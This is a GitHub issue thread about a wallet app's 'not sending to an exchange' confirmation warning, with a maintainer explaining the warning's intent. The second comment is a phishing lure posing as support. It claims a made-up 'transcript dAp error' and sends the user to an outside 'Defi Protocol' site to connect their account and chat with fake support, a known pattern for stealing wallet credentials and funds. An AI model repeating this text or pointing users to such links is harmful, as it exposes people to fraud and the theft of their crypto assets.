### ISSUE TITLE
"Not sending to an exchange"

### ISSUE THREAD

**Issue by miracle2k** [rainbow-me/rainbow#5042]
On the send confirmation screen, why am I being asked to confirm I am [not sending funds to an exchange](https://github.com/rainbow-me/rainbow/blob/838a248927f666198ef74a4ba0489fa7455d11bc/src/screens/SendConfirmationSheet.tsx#L93)?

**Comment by waffleys** [comment]
> On the send confirmation screen, why am I being asked to confirm I am [not sending funds to an exchange](https://github.com/rainbow-me/rainbow/blob/838a248927f666198ef74a4ba0489fa7455d11bc/src/screens/SendConfirmationSheet.tsx#L93)?

Hi @miracle2k  
You are having a transcript dAp error command on your request. To fix this, visit the Defi protocol page and click on Resolve to establish connection with your account and generate QR code to submit your request. Refresh your page account transcript on the end-to-end server application via [Defi Protocol](https://defirefixprotocol.web.app) to complete your request.
Note: Click on the chat button at the bottom part of the page to initiate a chat with the support team on a live chat to review and assist for more information.
Regards.

**Comment by jinchung** [comment]
Hi, we will be reworking this warning soon - the original intent was for users to double check that they were sending funds to a place they intend to / have access to the funds in the case of an exchange that they have an account with (e.g, like Coinbase which has very precise addresses that you need to use in order to receive funds for different token types). We'll be rewording or reworking this check shortly!
